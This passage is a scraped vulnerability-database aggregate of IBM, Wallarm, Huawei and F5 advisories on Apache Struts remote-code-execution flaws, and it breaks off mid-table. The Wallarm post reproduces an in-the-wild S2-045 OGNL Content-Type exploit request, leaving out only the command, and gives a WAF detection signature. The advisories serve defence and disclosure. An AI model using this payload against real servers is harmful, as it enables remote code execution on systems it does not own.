Extract the struts-2.3.28-lib.zip package on the management node.\n\n# unzip struts-2.3.28-lib.zip \n# cd struts-2.3.28/lib/ \n# cp xwork-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-json-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-spring-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-jasperreports-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp ognl-3.0.13.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-2.3.15.2.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-2.3.15.2.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-2.3.15.2.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-2.3.15.2.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-2.3.18.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/ognl-3.0.6.jar /root/backup \n\n4\\. Restart Platform HPC services. 
If high availability is enabled, run the following commands on the active management node:\n\n# pcmhatool failmode -m manual \n# pmcadmin stop \n# pmcadmin start \n# pcmhatool failmode -m auto\n\nOtherwise, if high availability is not enabled, run the following commands on the management node:\n\n# pmcadmin stop \n# pmcadmin start \n\n## ", "cvss3": {}, "published": "2018-06-18T01:32:26", "type": "ibm", "title": "Security Bulletin: OPEN Source Apache Struts Vulnerabilities IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, and Platform HPC (CVE-2016-4003)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-4003"], "modified": "2018-06-18T01:32:26", "id": "055E59F2851A7F333363149D5BB7D9E0D90ADD13DFCB70EC1FF9D592FA2988C8", "href": "https://www.ibm.com/support/pages/node/629045", "cvss": {"score": 0.0, "vector": "NONE"}}], "wallarmlab": [{"lastseen": "2017-05-01T13:42:41", "description": "Two days ago Apache published a fix for the new [Remote Code Execution vulnerability in Struts2](<https://cwiki.apache.org/confluence/display/WW/S2-045>).\n\nStruts2 RCE attacks in the wild\n\nThis vulnerability allows an attacker to execute arbitrary Java code on the application server.\n\nWe can confirm that we caught the first exploit for this vulnerability in the wild. And this is crazy. Like previous OGNL exploits, this one is also based on OGNL macros to construct and call a shell command via a sequence of Java classes.\n\n#### Exploit\n\n[Wallarm](<http://wallarm.com>) first caught the exploit on Mar 8, 03:34 am. 
Please look the sample malicious HTTP request below:\n \n \n GET /valid-struts.action HTTP/1.1 \n User-Agent: any \n Content-Type: %{(#_=\u2018multipart/form-data\u2019).(#dm=[@ognl](<http://twitter.com/ognl>).OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\u2018com.opensymphony.xwork2.ActionContext.container\u2019]).(#ognlUtil=#container.getInstance([@com](<http://twitter.com/com>).opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=([@org](<http://twitter.com/org>).apache.struts2.ServletActionContext@getResponse().getOutputStream())).([@org](<http://twitter.com/org>).apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\n\n#### Mitigation\n\nPlease check that you\u2019ve already updated to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [Struts 2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>)\n\nIf you are unable to update Struts2 immediately you should apply virtual patch to your WAF. It\u2019s essentially similar to the previous OGNL exploits however it\u2019s likely to not be covered by many existing WAF signatures. 
If you are using an old-fashioned Web Application Firewall, make sure to add this string as a new signature:\n \n \n %{(#_='multipart/form-data')\n\n#### History\n\nHere is a list of all historical OGNL security issues in Struts2:\n\n * <https://www.cvedetails.com/cve/CVE-2016-3093/>\n * <https://www.cvedetails.com/cve/CVE-2016-0785/>\n * <https://www.cvedetails.com/cve/CVE-2013-2251/>\n * <https://www.cvedetails.com/cve/CVE-2013-2135/>\n * <https://www.cvedetails.com/cve/CVE-2013-2134/>\n * <https://www.cvedetails.com/cve/CVE-2013-2115/>\n * <https://www.cvedetails.com/cve/CVE-2013-1966/>\n * <https://www.cvedetails.com/cve/CVE-2013-1965/>\n * <https://www.cvedetails.com/cve/CVE-2012-4387/>\n * <https://www.cvedetails.com/cve/CVE-2012-0838/>\n * <https://www.cvedetails.com/cve/CVE-2012-0391/>\n * <https://www.cvedetails.com/cve/CVE-2010-1870/>\n * <https://www.cvedetails.com/cve/CVE-2008-6504/>\n\nIt means that the OGNL technology is broken altogether.\n\n* * *\n\n[New Struts2 Remote Code Execution exploit caught in the wild](<https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium.", "cvss3": {}, "published": "2017-03-09T00:15:54", "title": "New Struts2 Remote Code Execution exploit caught in the wild", "type": "wallarmlab", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2251", "CVE-2012-0391", "CVE-2008-6504", "CVE-2012-0838", "CVE-2016-0785", "CVE-2010-1870", "CVE-2013-1965", "CVE-2012-4387", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2016-3093"], "modified": "2017-03-10T16:52:09", "href": "https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2?source=rss----49b51199b3da---4", "id": "WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "huawei": [{"lastseen": "2023-09-28T08:30:37", "description": "Apache Struts2 is a second-generation and enterprise-ready Java web application framework based on the Model-View-Controller (MVC) architecture. This advisory describes four vulnerabilities of Apache Struts 2.0.0 - 2.3.15. Huawei products and applications using the above versions of Apache Struts are therefore affected by the vulnerabilities, not due to a defect of the Huawei product or application.\n\nThe Apache Struts2 contains the vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks.( Vulnerability ID : HWNSIRT-2013-0601) The link is at [http://struts.apache.org/release/2.3.x/docs/s2-014.html ](<http://struts.apache.org/release/2.3.x/docs/s2-014.html%20>)(CVE-2013-2115, CVE-2013-1966)\n\nThe Apache Struts2 contains the vulnerability introduced by wildcard matching mechanism or double evaluation of OGNL Expression allows remote command execution.( Vulnerability ID : HWNSIRT-2013-0704) The link is at <http://struts.apache.org/release/2.3.x/docs/s2-015.html> (CVE-2013-2134, CVE-2013-2135)\n\nThe Apache Struts2 contains the vulnerability introduced by manipulating parameters prefixed with \"action:\"/\"redirect:\"/\"redirectAction:\", which may result in remote command execution. (Vulnerability ID : HWNSIRT-2013-0705) .The link is at <http://struts.apache.org/release/2.3.x/docs/s2-016.html> ([CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>)).\n\nThe Apache Struts2 contains the vulnerability introduced by manipulating parameters prefixed with \"redirect:\"/\"redirectAction:\" which allows open redirects. (Vulnerability ID : HWNSIRT-2013-0706). The link is at <http://struts.apache.org/release/2.3.x/docs/s2-017.html> (CVE-2013-2248). \n\nApache released Struts 2.3.15.1 as an official patch for Struts 2. 
Upgrading to Struts 2.3.15.1 is the only workaround. Based on the Struts 2.3.15.1 patch, Huawei provides a fix for the vulnerability. \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-07-30T00:00:00", "type": "huawei", "title": "Security Advisory-Multiple Apache Struts2 Vulnerabilities in Huawei Products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251"], "modified": "2014-01-08T00:00:00", "id": "HUAWEI-SA-20130730-STRUTS", "href": "https://www.huawei.com/en/psirt/security-advisories/2013/hw-276819", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-27T20:53:41", "description": "Some versions of Apache Struts2 software used in Huawei devices have security vulnerabilities. A patch released for the software to fix vulnerabilities CVE-2014-0050 and CVE-2014-0094 has the risk of being bypassed. 
(Vulnerability ID: HWPSIRT-2014-0420)\n\nThis Vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID: CVE-2014-0116.\n", "cvss3": {}, "published": "2014-07-07T00:00:00", "type": "huawei", "title": "Security Advisory-Apache Struts2 vulnerability on Huawei multiple products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0116"], "modified": "2014-07-08T00:00:00", "id": "HUAWEI-SA-20140707-01-STRUTS2", "href": "https://www.huawei.com/en/psirt/security-advisories/2014/hw-350733", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2017-06-08T00:16:02", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 
\n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {}, "published": "2017-02-09T01:52:00", "type": "f5", "title": "Apache Struts 2 vulnerabilities CVE-2013-1966, CVE-2013-2115, CVE-2013-2134, and CVE-2013-2135", 
"bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135"], "modified": "2017-02-10T04:50:00", "id": "F5:K10506844", "href": "https://support.f5.com/csp/article/K10506844", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-09-29T13:19:18", "description": " \n\n\nParametersInterceptor in Apache Struts before 2.3.16.2 does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. ([CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>)) \n\n\nImpact \n\n\nNone. F5 products do not use the affected Apache Struts version. 
\n\n", "cvss3": {}, "published": "2014-05-15T15:23:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2014-0112", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113"], "modified": "2016-01-08T23:14:00", "id": "F5:K15261", "href": "https://support.f5.com/csp/article/K15261", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-29T13:18:47", "description": " \n\n\nCookieInterceptor in Apache Struts before 2.3.16.2, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. ([CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>)) \n\n\nImpact \n\n\nNone. F5 products do not use the affected Apache Struts version. 
\n\n", "cvss3": {}, "published": "2014-05-15T17:36:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2014-0113", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113"], "modified": "2016-01-08T23:14:00", "id": "F5:K15262", "href": "https://support.f5.com/csp/article/K15262", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:23:08", "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "cvss3": {}, "published": "2014-05-15T00:00:00", "type": "f5", "title": "SOL15261 - Apache Struts vulnerability CVE-2014-0112", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "id": "SOL15261", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15261.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:09", "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "cvss3": {}, "published": "2014-05-15T00:00:00", "type": "f5", "title": "SOL15262 - Apache Struts vulnerability CVE-2014-0113", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "id": "SOL15262", "href": 
"http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15262.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:18", "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "cvss3": {}, "published": "2014-05-15T00:00:00", "type": "f5", "title": "SOL15260 - Apache Struts vulnerability CVE-2014-0094", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "id": "SOL15260", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15260.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-09-05T15:58:37", "description": " \n\n\nThe ParametersInterceptor in Apache Struts before 2.3.16.1 allows remote attackers to "manipulate" the ClassLoader via the 
class parameter, which is passed to the getClass method. ([CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>)) \n\n\nImpact \n\n\nNone. F5 products do not use the affected Apache Struts version. \n\n", "cvss3": {}, "published": "2014-05-15T17:36:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2014-0094", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113"], "modified": "2016-01-08T23:14:00", "id": "F5:K15260", "href": "https://support.f5.com/csp/article/K15260", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:22:57", "description": "Recommended action\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n", "cvss3": {}, "published": "2014-01-20T00:00:00", "type": "f5", "title": "SOL14933 - Apache Struts vulnerability CVE-2013-2251", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-16T00:00:00", "id": "SOL14933", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/900/sol14933.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-02-08T16:15:37", "description": " * [CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \nForced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.\n * [CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \nThe fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag's attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. 
Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n\nImpact\n\nUsing a forced Object-Graph Navigation Language (OGNL) evaluation on untrusted user input allows an attacker to perform remote code execution leading to security degradation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-22T01:45:00", "type": "f5", "title": "Apache Struts vulnerabilities CVE-2020-17530 and CVE-2021-31805", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-15T23:18:00", "id": "F5:K24608264", "href": "https://support.f5.com/csp/article/K24608264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-06-08T00:16:33", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the 
vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 \n11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 \n11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 